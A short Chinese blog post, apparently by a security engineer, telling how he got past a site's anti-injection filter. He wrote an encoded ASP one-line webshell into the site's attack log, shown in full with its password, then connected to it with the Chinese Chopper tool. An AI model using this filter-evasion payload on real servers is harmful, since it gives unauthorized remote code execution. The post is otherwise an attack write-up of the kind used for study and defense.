唐小风

安全工程师这些年

今天呢,无聊啊,就开始了无聊的挖洞之旅,然后呢
一个破防注入把宝宝惹生气了
一步步的深入 ,终于getshell ,菜刀镇楼宝宝教你挖掘xss漏洞 附赠XSS载体测试神器
记一次上传漏洞测试  送2800个shell
 
【02】过程
看到这里我就蛋疼了 没思路啊
 
既然他说做了记录,那么咱们就查看下它的记录文件

 
看到这里 让我想到了构造asp一句话写进去
前面几种没加密的都失败了,于是写了个加密的
            ┼攠數畣整爠煥敵瑳∨≡┩愾           密码 a  (加密方式是: ANSI->Unicode)
提交       and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾

 
   http://**.**.**/sqlin.asp   菜刀连接之,成功

评论